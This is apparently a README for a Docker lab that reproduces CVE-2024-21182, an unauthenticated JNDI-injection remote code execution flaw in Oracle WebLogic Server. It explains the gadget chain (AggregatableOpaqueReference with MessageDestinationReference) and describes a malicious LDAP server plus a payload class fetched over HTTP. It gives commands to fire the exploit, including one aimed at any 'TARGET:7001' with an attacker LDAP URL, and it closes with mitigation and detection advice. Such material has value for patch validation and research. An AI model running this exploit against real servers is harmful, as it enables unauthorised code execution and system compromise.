## https://sploitus.com/exploit?id=01B2AB6E-7C39-548C-A440-9211BEE3A955
# CVE-2024-21182 โ Oracle WebLogic Server T3/IIOP JNDI Injection โ RCE (lab)
A self-contained, one-command Docker lab to **reproduce and validate** the
Oracle WebLogic Server `OpaqueReference` JNDI-injection vulnerability family
(CVE-2024-21182, a patch bypass of CVE-2023-21839) and turn it into
**unauthenticated remote code execution**.
> โ ๏ธ **For authorized security research, education, and patch validation only.**
> See [DISCLAIMER](#disclaimer). Run it only against this lab or systems you own.
---
## What this demonstrates
CVE-2024-21182 is an **unauthenticated** vulnerability in the **Core** component
of Oracle WebLogic Server, reachable over the **T3 / IIOP** protocols (default
port `7001`). It allows an attacker to bind a crafted "reference" object into
the server's JNDI tree and trigger a **server-side JNDI lookup against an
attacker-controlled URL** โ classic JNDI injection that escalates to RCE.
| | |
|---|---|
| **CVE** | CVE-2024-21182 |
| **Product** | Oracle WebLogic Server (Core) |
| **Affected (per Oracle)** | 12.2.1.4.0, 14.1.1.0.0 |
| **Fixed in** | Oracle **October 2024** Critical Patch Update |
| **Vector** | Network, unauthenticated, T3/IIOP (port 7001) |
| **CISA KEV** | Yes (known exploited in the wild) |
| **Class** | Patch bypass of CVE-2023-21839 (`OpaqueReference` JNDI injection) |
### Root cause
A WebLogic reference object is resolved **server-side** during `lookup()` by an
`ObjectFactory` that performs a nested JNDI lookup against an attacker-supplied
URL:
```
weblogic.jndi.internal.WLContextImpl.lookup
โ javax.naming.spi.NamingManager.getObjectInstance
โ weblogic.application.naming.MessageDestinationObjectFactory.getObjectInstance
โ weblogic.application.naming.MessageDestinationReference.lookupMessageDestination (line 62)
โ new InitialContext().lookup( ldap://attacker/โฆ ) โ attacker-controlled, server-side
```
CVE-2023-21839 reached this via `weblogic.jndi.internal.ForeignOpaqueReference`,
which Oracle then guarded. **CVE-2024-21182 bypasses that guard** by reaching the
same foreign lookup through
`weblogic.ejb.container.internal.AggregatableOpaqueReference`, whose private
`referent` field is reflectively set to a
`weblogic.application.naming.MessageDestinationReference`.
---
## โ ๏ธ Important: lab image vs. CVE-listed versions
This lab uses **`vulhub/weblogic:12.2.1.3-2018`** (WebLogic **12.2.1.3**, bundled
**JDK 1.8.0_151**) because it is the only freely redistributable vulnerable
WebLogic image โ the versions CVE-2024-21182 formally lists (12.2.1.4.0 /
14.1.1.0.0) require an Oracle license and cannot be published here.
Consequences, stated honestly:
* The lab **faithfully reproduces the `OpaqueReference` JNDI-injection โ RCE
vulnerability class, exercised with the exact CVE-2024-21182 gadget classes**
(`AggregatableOpaqueReference` + `MessageDestinationReference`).
* It does **not** prove the *patch-bypass* property itself โ 12.2.1.3 predates
the CVE-2023-21839 blacklist, so there is no patch to bypass on this image. To
demonstrate the bypass specifically you need a licensed 12.2.1.4 build patched
up to just-before-Oct-2024 CPU.
* **RCE leg:** works here because JDK 1.8.0_151 predates 8u191 and defaults
`com.sun.jndi.ldap.object.trustURLCodebase=true` (remote codebase class
loading). On modern JDKs the *injection* still fires (SSRF), but RCE requires a
gadget already on the WebLogic classpath instead of a remote codebase.
---
## Quick start
Requirements: Docker + Docker Compose v2. ~3 GB image pull. On Apple Silicon the
image runs under `linux/amd64` emulation (slower cold boot, 2โ5 min).
```bash
git clone
cd CVE-2024-21182-lab
docker compose up -d # starts: weblogic (:7001) + attacker (LDAP/HTTP)
./validate.sh # waits for boot, fires the exploit, prints PASS/FAIL
```
Expected tail of `./validate.sh`:
```
[+] RCE CONFIRMED โ command executed inside the WebLogic container as:
------------------------------------------------------------
uid=1000(oracle) gid=1000(oracle) groups=1000(oracle)
Linux ... x86_64 GNU/Linux
------------------------------------------------------------
[+] CVE-2024-21182 reproduced (unauthenticated T3 JNDI injection -> RCE)
```
Tear down:
```bash
docker compose down
```
---
## How it works (the moving parts)
```
t3://weblogic:7001 ldap://attacker:1389/Evil
PoC client โโโโโโโโโโโโโโโโโโโโโโโโบ WebLogic โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโบ attacker (LDAP)
(in weblogic bind() + lookup() (victim) server-side JNDI lookup returns Reference
container) {javaCodeBase=http://attacker:8888/}
โ โ
โโโโโโโโโโโ GET /Exploit.class โโโโโโโโโโโโโโโ (HTTP codebase)
loads + instantiates โ static{} runs `id`
```
* **`poc/CVE_2024_21182.java`** โ the T3 client. Builds the malicious
`AggregatableOpaqueReference`, `bind()`s it, then `lookup()`s to trigger
server-side resolution. Parameterized: ` `. It is
compiled **inside** the WebLogic container by `validate.sh` because the gadget
classes live in WebLogic's full module set (not the redistributable thin
client), so no Oracle jars are shipped here.
* **`exploit/ldap_server.py`** โ minimal malicious LDAP server returning a JNDI
`Reference` plus an HTTP server hosting the factory class. Runs in the
`attacker` container, reachable from WebLogic by service name `attacker`.
* **`exploit/Exploit.java` / `Exploit.class`** โ the payload factory (Java 8
bytecode). Its static initializer runs `id` / `uname -a` and writes the output
to `/tmp/RCE_PROOF_CVE_2024_21182` inside the victim. Harmless by design โ edit
it and run `exploit/build.sh` to change the command.
The `ClassCastException (Exploit cannot be cast to ObjectFactory)` you will see
is **expected and cosmetic** โ it occurs *after* the static initializer (the
payload) has already executed.
---
## Validate a patched / real target
Point the PoC at any T3 endpoint you are authorized to test:
```bash
# from inside a host with the WebLogic thin client, or adapt validate.sh:
java -cp ".:wlthint3client.jar" CVE_2024_21182 TARGET:7001 ldap://YOUR_LDAP:1389/Evil
```
* **Injection fires (outbound LDAP seen), no RCE** โ JDK has
`trustURLCodebase=false`; you still have SSRF, and RCE may be possible via a
classpath gadget.
* **Nothing fires** โ the OpaqueReference path is patched (Oct-2024 CPU applied).
---
## Mitigation
* **Patch** โ apply the Oracle October 2024 Critical Patch Update.
* **Network** โ restrict T3/IIOP (7001) with WebLogic connection filters
(`weblogic.security.net.ConnectionFilterImpl`) and host firewalls.
* **JDK** โ keep `com.sun.jndi.ldap.object.trustURLCodebase=false` (default on
current JDKs); breaks the remote-codebase RCE leg (not the injection leg).
* **Detect** โ outbound LDAP/RMI/DNS from the WebLogic JVM to non-allowlisted
hosts; unexpected child processes of the WebLogic process; T3 `bind` of
`*OpaqueReference` types.
---
## Credits & references
* Public PoC gadget: [`k4it0k1d/CVE-2024-21182`](https://github.com/k4it0k1d/CVE-2024-21182)
* Vulnerable image: [vulhub](https://github.com/vulhub/vulhub) (`weblogic/CVE-2023-21839`)
* Background: Oracle CPU advisories; CVE-2023-21839 research (WebLogic `OpaqueReference` family)
## DISCLAIMER
This project is published for **authorized security testing, defensive
validation, and education**. The vulnerable software runs in an isolated Docker
lab. Do **not** use these techniques against systems you do not own or are not
explicitly authorized to test. The authors accept no liability for misuse. See
[`LICENSE`](LICENSE).